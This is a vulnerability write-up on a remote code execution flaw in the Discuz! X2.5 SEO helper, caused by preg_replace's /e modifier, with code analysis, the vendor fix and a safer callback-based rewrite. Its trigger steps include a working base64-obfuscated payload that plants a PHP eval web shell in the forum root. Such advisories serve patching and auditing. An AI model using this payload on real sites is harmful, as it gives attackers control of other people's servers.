Discuz! X2.5 /source/class/helper/helper_seo.php Remote Code Execution Vul
2015-05-24 10:27
Contents
1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Vulnerable Code Analysis
5. Mitigation
6. Offense and Defense Thoughts
1. Vulnerability Description
A remote code execution vulnerability in the SEO module, caused by preg_replace being called with the "e" modifier while the replacement expression wraps the matched text in double quotes.
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2012-06420
2. Trigger Conditions
1. In the admin backend, enable the SEO extension.
2. Register any account.
3. Log in with that user and post a blog entry (note: a blog entry, not a forum post).
4. Add an image, choose "network image", and use the address {${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
5. Visit the entry: demo.php is generated in the forum root directory, a one-line shell whose password is c.
Relevant Link:
http://weibo.com/2242334800/ygxonqLF9?type=comment#_rnd1432431149028
http://sebug.net/vuldb/ssvid-60082
3. Affected Scope
4. Vulnerable Code Analysis
/source/class/helper/helper_seo.php
```php
..
if($searcharray && $replacearray) {
    $_G['trunsform_tmp'] = array();
    /*
     1. The $content being rewritten comes from the image address supplied by the user.
     2. The replacement expression handed to preg_replace wraps the matched text in double quotes.
     3. The search pattern passed to preg_replace carries the "e" modifier.
     Because of 3, PHP passes the substituted replacement to eval() once the match is done, and because
     eval("${${}}") is a dynamically evaluated construct, an attacker can inject code remotely.
    */
    $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1\\2\\3\\4", "</relatedlink>")', $content);
    $content = preg_replace($searcharray, $replacearray, $content, 1);
    $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
}
..
```
Relevant Link:
http://www.wooyun.org/upload/201204/2620001868555ef2f2153e9b615d32467724d943.jpg
5. Mitigation
/source/class/helper/helper_seo.php
```php
..
if($searcharray && $replacearray) {
    $_G['trunsform_tmp'] = array();
    /* After the fix the inner double quotes become single quotes, so the ${${}} dynamic syntax is no longer interpolated and cannot execute. */
    $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", "helper_seo::base64_transform('encode', '<relatedlink>', '\\1\\2\\3\\4', '</relatedlink>')", $content);
    $content = preg_replace($searcharray, $replacearray, $content, 1);
    $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
}
..
```
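The single-quote fix above still leaves the "e" modifier in place, so the replacement is still run through eval(); the modifier was deprecated in PHP 5.5 and removed in PHP 7.0. The following is an added example, not Discuz! code, showing the same three-step SEO wrapping (encode matched markup, replace keywords, decode) rewritten with preg_replace_callback so that no eval() happens at all. `base64_transform` here is a hypothetical stand-in for `helper_seo::base64_transform`, and the sample content is constructed for the demonstration.

```php
<?php
// Added example (not from Discuz!): the helper_seo transformation without the /e modifier.
// base64_transform below is a hypothetical stand-in for helper_seo::base64_transform.

function base64_transform(string $mode, string $prefix, string $text, string $suffix): string
{
    // Wrap matched markup in base64 so the keyword replacement step cannot alter it,
    // then unwrap it again afterwards.
    return $mode === 'encode'
        ? $prefix . base64_encode($text) . $suffix
        : $prefix . base64_decode($text) . $suffix;
}

function seo_transform(string $content, array $searcharray, array $replacearray): string
{
    // Same alternation as the original pattern, with the "e" modifier dropped ("/ies" -> "/is").
    $pattern = '/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/is';

    // The callback receives the match as plain data. Nothing is interpolated or eval'd,
    // so a "${...}" sequence inside an image address is treated as ordinary characters.
    $content = preg_replace_callback($pattern, function (array $m): string {
        // Groups 1-4 correspond to "\\1\\2\\3\\4" in the original; unmatched groups are empty.
        $matched = ($m[1] ?? '') . ($m[2] ?? '') . ($m[3] ?? '') . ($m[4] ?? '');
        return base64_transform('encode', '<relatedlink>', $matched, '</relatedlink>');
    }, $content);

    // Keyword -> related-link replacement, limited to one substitution per pattern as in the original.
    $content = preg_replace($searcharray, $replacearray, $content, 1);

    // Restore the protected markup.
    return preg_replace_callback('/<relatedlink>(.*?)<\/relatedlink>/is', function (array $m): string {
        return base64_transform('decode', '', $m[1], '');
    }, $content);
}

// Constructed sample: an image tag whose src carries a "${...}" sequence, plus a keyword to link.
$sample = 'see <img src="http://example.invalid/${${x}}.png" /> for discuz tips';
$out = seo_transform($sample, ['/discuz/i'], ['<a href="/tag/discuz">Discuz</a>']);
echo $out, "\n";

// The img tag comes back byte-for-byte and the keyword is linked; nothing was executed.
if (strpos($out, '${${x}}') === false || strpos($out, '<a href="/tag/discuz">') === false) {
    echo "unexpected output\n";
}
```

Running this prints the input with only the word "discuz" turned into a link; the "${${x}}" inside the image address survives untouched because the match value never passes through eval(). When auditing PHP code bases for this class of bug, grep for preg_replace patterns whose trailing modifiers contain "e" and move each one to preg_replace_callback.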
6. Offense and Defense Thoughts
Copyright (c) 2015 LittleHann All rights reserved